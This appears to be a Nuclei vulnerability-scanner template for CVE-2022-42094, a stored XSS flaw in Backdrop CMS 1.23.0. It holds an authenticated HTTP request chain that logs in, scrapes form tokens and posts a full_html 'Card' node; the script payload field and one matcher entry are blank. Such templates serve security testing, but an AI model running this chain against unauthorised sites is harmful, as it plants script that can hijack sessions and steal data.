id: CVE-2022-42094
info:
name: Backdrop CMS version 1.23.0 - Stored Cross Site Scripting
author: theamanrawat
severity: medium
description: |
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.
reference:
- https://github.com/backdrop/backdrop/releases/tag/1.23.0
- https://github.com/bypazs/CVE-2022-42094
- https://nvd.nist.gov/vuln/detail/CVE-2022-42094
- https://backdropcms.org
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2022-42094
cwe-id: CWE-79
epss-score: 0.00567
epss-percentile: 0.75259
cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: backdropcms
product: backdrop
tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms
http:
- raw:
- |
GET /?q=user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
- |
GET /?q=node/add/card HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=node/add/card HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="title"
{{randstr}}
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="field_image[und][0][fid]"
0
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="field_image[und][0][display]"
1
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="changed"
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="form_build_id"
{{form_id_2}}
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="form_token"
{{form_token}}
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="form_id"
card_node_form
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="body[und][0][value]"
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="body[und][0][format]"
full_html
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="status"
1
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="name"
{{name}}
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="date[date]"
2023-04-13
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="date[time]"
21:49:36
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="path[auto]"
1
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="comment"
1
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="additional_settings__active_tab"
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="op"
Save
------WebKitFormBoundaryWEcZgRB4detkrGaY--
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body
words:
-
- Backdrop CMS
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: form_id_1
group: 1
regex:
- name="form_build_id" value="(.*)"
internal: true
- type: regex
name: name
group: 1
regex:
- name="name" value="(.*?)"
internal: true
- type: regex
name: form_id_2
group: 1
regex:
- name="form_build_id" value="(.*)"
internal: true
- type: regex
name: form_token
group: 1
regex:
- name="form_token" value="(.*)"
internal: true
# digest: 4a0a004730450221009423d24591a621c265ff58d530db4d6bac38d5a05e11eaee612ba4153004b9f7022038c091f07d28bdf026cceffc6a5bd07ac874afcb51c621ed0738ffe72a5ccda5:922c64590222798bb761d5b6d8e72950